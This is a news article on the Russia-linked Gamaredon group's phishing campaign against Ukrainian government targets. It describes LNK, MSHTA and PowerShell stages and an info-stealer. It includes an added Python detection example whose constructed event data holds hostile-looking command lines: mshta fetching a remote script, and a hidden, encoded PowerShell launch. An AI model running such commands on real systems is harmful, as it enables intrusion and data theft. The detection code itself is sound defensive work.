15 September 2022

Russia-linked Gamaredon APT targets Ukrainian government with infostealers

A Russia-linked, state-backed hacker group known as Gamaredon is targeting entities in Ukraine with information-stealing malware in a new campaign, part of a cyber-espionage operation that has been running since August 2022.

The threat actor is targeting users in Ukraine with malicious LNK files distributed in RAR archives delivered via phishing emails. The campaign is using multiple modular PowerShell and VBScript (VBS) scripts as part of the infection chain, according to Cisco’s Talos threat research team.

The campaign involves phishing emails purporting to contain information related to the ongoing Russian invasion of Ukraine. The emails deliver Microsoft Office documents with malicious VBS macros, which download and open RAR archives containing LNK files. These LNK files, in turn, download and run the next-stage payload on the infected endpoint.

The Talos team said they found some overlap between the tactics, techniques and procedures (TTPs), malware artifacts and infrastructure used in this campaign and those leveraged in a series of attacks the Ukraine Computer Emergency Response Team (CERT-UA) recently attributed to Gamaredon, which it tracks as UAC-0010 (aka Armageddon, Primitive Bear, Shuckworm, Winterflouder, BlueAlpha, BlueOtso, IronTiden, SectorCO8, Callisto, Trident Ursa).

The group has been active since 2013 and predominantly targets Ukrainian government organizations, critical infrastructure and entities affiliated with Ukraine’s defence, security and law enforcement agencies.

Once opened, the LNK files attempt to execute MSHTA.EXE and download a malicious PowerShell script, which decodes and executes a second PowerShell script. This second script collects data from the victim and uploads it to a remote server.

“The PowerShell code residing in the environment variable is meant to provide the attackers with continued access to the infected endpoint with the capability to deploy additional payloads as desired,” the researchers noted.

The attackers then deploy a payload via the PowerShell script: an info-stealer that exfiltrates files with specific extensions from the infected endpoint (.doc, .docx, .xls, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z and .mdb). Talos says it has not observed this particular malware in previous Gamaredon campaigns. The new malware may be a component of the group’s “Giddome” backdoor family, the researchers said, but they have not been able to confirm that so far.
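The infection chain above (LNK launching MSHTA.EXE with a remote script, which in turn spawns PowerShell) and the info-stealer's interest in a fixed set of document extensions both leave traces in endpoint telemetry. The following is an added example, not code from the article or from Talos, showing two simple detections run over constructed Sysmon-style process-creation and file-access events: mshta.exe started with an http(s) argument, powershell.exe whose parent is mshta.exe, and a single process reading many files with the targeted extensions. The event field names, the sample process IDs, the IP address and the read threshold are all assumptions made for the example.

```python
"""Detections for an mshta -> PowerShell chain and for bulk reads of targeted
document types, run over constructed event samples (not real telemetry)."""
import re
from collections import defaultdict

# Constructed, simplified process-creation events (Sysmon Event ID 1 style).
# Field names and values are assumptions for this example.
SAMPLE_EVENTS = [
    {"pid": 1001, "ppid": 400, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe", "user": "ALICE"},
    {"pid": 1002, "ppid": 1001, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe http://198.51.100.10/index.html", "user": "ALICE"},
    {"pid": 1003, "ppid": 1002,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -enc SQBFAFgA", "user": "ALICE"},
    {"pid": 1004, "ppid": 700,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1", "user": "SYSTEM"},
    {"pid": 1005, "ppid": 1001, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe C:\\Program Files\\Vendor\\setup.hta", "user": "ALICE"},
]

# Constructed file-read events keyed by the reading process. Assumed shape.
SAMPLE_FILE_EVENTS = [
    {"pid": 1003, "path": r"C:\Users\alice\Documents\report.docx"},
    {"pid": 1003, "path": r"C:\Users\alice\Documents\budget.xls"},
    {"pid": 1003, "path": r"C:\Users\alice\Documents\notes.txt"},
    {"pid": 1003, "path": r"C:\Users\alice\Pictures\scan.jpeg"},
    {"pid": 1003, "path": r"C:\Users\alice\Downloads\archive.rar"},
    {"pid": 1003, "path": r"C:\Users\alice\Downloads\contacts.mdb"},
    {"pid": 1003, "path": r"C:\Windows\System32\kernel32.dll"},
    {"pid": 1004, "path": r"C:\scripts\backup.ps1"},
    {"pid": 1004, "path": r"C:\scripts\log.txt"},
]

# Extensions the article lists as collected by the info-stealer.
TARGETED_EXTENSIONS = {".doc", ".docx", ".xls", ".rtf", ".odt", ".txt", ".jpg",
                       ".jpeg", ".pdf", ".ps1", ".rar", ".zip", ".7z", ".mdb"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def extension(path):
    """Return the lower-cased extension (with dot) of a Windows path, or ''."""
    name = path.rsplit("\\", 1)[-1]
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_chain(events):
    """Flag mshta.exe launched with a remote URL and powershell.exe spawned by mshta.exe.

    Returns a list of (pid, reason) tuples in event order.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        if name == "mshta.exe" and URL_RE.search(e["cmd"]):
            findings.append((e["pid"], "mshta_remote_url"))
        if name == "powershell.exe":
            parent = by_pid.get(e["ppid"])
            if parent is not None and image_name(parent["image"]) == "mshta.exe":
                findings.append((e["pid"], "powershell_child_of_mshta"))
    return findings


def detect_mass_read(file_events, threshold=5):
    """Flag processes that read at least `threshold` files with targeted extensions.

    Returns a dict of pid -> count for processes over the threshold.
    """
    counts = defaultdict(int)
    for ev in file_events:
        if extension(ev["path"]) in TARGETED_EXTENSIONS:
            counts[ev["pid"]] += 1
    return {pid: n for pid, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for pid, reason in detect_chain(SAMPLE_EVENTS):
        print(f"process {pid}: {reason}")
    for pid, n in detect_mass_read(SAMPLE_FILE_EVENTS).items():
        print(f"process {pid}: read {n} files with targeted extensions")
```

The local .hta launch (pid 1005) and the scheduled backup script (pid 1004) are deliberately left unflagged: tying the alert to a remote URL argument and to the mshta parent, rather than to mshta.exe or powershell.exe alone, keeps the rule usable on hosts where both binaries run legitimately. The read threshold is a tuning knob; a real deployment would also bound it by time window and by user context.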

The technical details of this campaign, along with Indicators of Compromise (IoCs), can be found in the Talos report.
